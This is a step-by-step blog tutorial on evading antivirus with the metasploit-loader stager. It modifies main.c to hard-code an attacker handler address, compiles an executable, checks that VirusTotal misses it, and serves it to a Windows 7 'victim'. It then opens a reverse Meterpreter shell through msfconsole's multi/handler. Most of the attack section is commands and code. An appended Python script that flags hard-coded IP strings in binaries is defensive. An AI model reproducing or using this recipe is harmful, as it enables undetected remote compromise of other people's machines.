Bypassing AV through Metasploit Loader 32-Bit
Bypassing antivirus engines on VirusTotal by generating a payload with Metasploit Loader 32-Bit.
Metasploit-Loader is a quick stager client, written in the C programming language (easy to understand) and compatible with the Metasploit Framework, created by Raphael Mudge (rsmudge).
Metasploit-Loader connects to the Metasploit handler, fetches the DLL, loads it in memory and passes control back to us.
STEPS:
1. Download & Save Metasploit-Loader:
Use Link: Metasploit-Loader
Use Commands: git clone https://github.com/rsmudge/metasploit-loader.git
Install Metasploit-Loader:
2. Edit the Main.c file:
Edit the int main function in metasploit-loader/master/src/main.c as shown below:
In main.c:
if (argc != 3) {
    printf("%s [host] [port]\n", argv[0]);
    exit(1);
}
/* connect to the handler */
SOCKET my_socket = wsconnect(argv[1], atoi(argv[2]));
Replace the above lines of code with the following (the argument check is dropped and the handler address and port are hard-coded):
/* connect to the handler */
SOCKET my_socket = wsconnect("192.168.137.128", 9500);
Save the file main.c.
Here, the attacker's IP & port are 192.168.137.128 & 9500.
3. Generating exe file by Compiling main.c with a MinGW compiler:
Use Commands: i686-w64-mingw32-gcc main.c -o loadmeta.exe -lws2_32
This compiles main.c & produces the executable file loadmeta.exe.
4. Test the Executable against the AntiVirus:
You can verify the payload against antivirus engines: the file goes undetected.
If you scan the executable on VirusTotal, it goes undetected by many antivirus engines, such as AVG, Avast, PaloAlto, Tencent, Malwarebytes, Alibaba, Cat-QuickHeal, etc.
5. Transfer Payload to Victim’s Machine:
Transfer the exe file to the victim’s machine (Windows 7)
Here, we use Python's SimpleHTTPServer to transfer the executable to the victim's machine; once run, it acts as a reverse payload and connects back to the attacker's machine (Kali).
Use Commands: python -m SimpleHTTPServer
6. Start Multi Handler:
Start a multi handler on the attacker's machine to receive the reverse_tcp Meterpreter connection coming from the victim.
Use Commands:
> msfconsole
> use exploit/multi/handler
> set PAYLOAD windows/meterpreter/reverse_tcp
> set LHOST 192.168.137.128
> set LPORT 9500
> exploit
7. Download & Run the Payload:
Connect to the HTTP server from the victim's machine. Download & run the executable file.
Also, the Windows 7 antivirus shows no warning for the payload, loadmeta.exe.
Run the executable file:
8. Reverse_Shell at Attacker’s Machine:
Now, check the handler: a reverse Meterpreter session has been created by the Metasploit-Loader from the victim's machine.
Use Commands: getuid // to verify the source.
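An added example, not code from the original post or from the metasploit-loader project: a Python triage script showing that the handler address hard-coded in step 2 survives in the compiled loadmeta.exe as a plain ASCII string, so a defender can recover it with a simple scan even when the file scores clean on VirusTotal in step 4. The sample bytes are constructed, not a real PE; the port is passed as an integer and leaves no such string.

```python
import re

# Constructed stand-in for a compiled stager (not a real PE file): the IPv4
# string literal hard-coded in main.c is stored as plain ASCII in the image,
# alongside the name of the Winsock DLL linked with -lws2_32.
SAMPLE_IMAGE = (
    b"MZ\x90\x00" + b"\x00" * 16
    + b"ws2_32.dll\x00" + b"\x00" * 8
    + b"%s [host] [port]\n\x00"
    + b"192.168.137.128\x00"      # the handler address from step 2
    + b"999.1.1.1\x00"            # looks like an address but is not valid
    + b"\x00" * 16
)

# Dotted quad not glued to other digits or dots (skips version strings like 1.2.3.4.5).
IPV4_RE = re.compile(rb"(?<![0-9.])(?:[0-9]{1,3}\.){3}[0-9]{1,3}(?![0-9.])")


def find_ipv4_literals(data: bytes) -> list:
    """Return distinct IPv4 strings in data whose octets are all in 0..255."""
    found = []
    for match in IPV4_RE.finditer(data):
        text = match.group().decode("ascii")
        if all(int(octet) <= 255 for octet in text.split(".")):
            if text not in found:
                found.append(text)
    return found


def uses_winsock(data: bytes) -> bool:
    """True if the image names the Winsock DLL, i.e. it links against ws2_32."""
    return b"ws2_32.dll" in data.lower()


def triage(data: bytes) -> dict:
    """Combine both checks; a Winsock-using image with a hard-coded IPv4 string
    is worth a closer look. The port (an int in the source) leaves no such
    string and would need disassembly of the call site to recover."""
    ips = find_ipv4_literals(data)
    return {
        "ipv4_literals": ips,
        "uses_winsock": uses_winsock(data),
        "suspicious": bool(ips) and uses_winsock(data),
    }


def triage_file(path: str) -> dict:
    """Run triage on an on-disk file, e.g. triage_file('loadmeta.exe')."""
    with open(path, "rb") as fh:
        return triage(fh.read())
```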
In the next session: Bypassing AV through Metasploit Loader 64-Bit
References:
1. Metasploit-Loader
2. MinGW Compiler
3. VirusTotal
Thanks!👾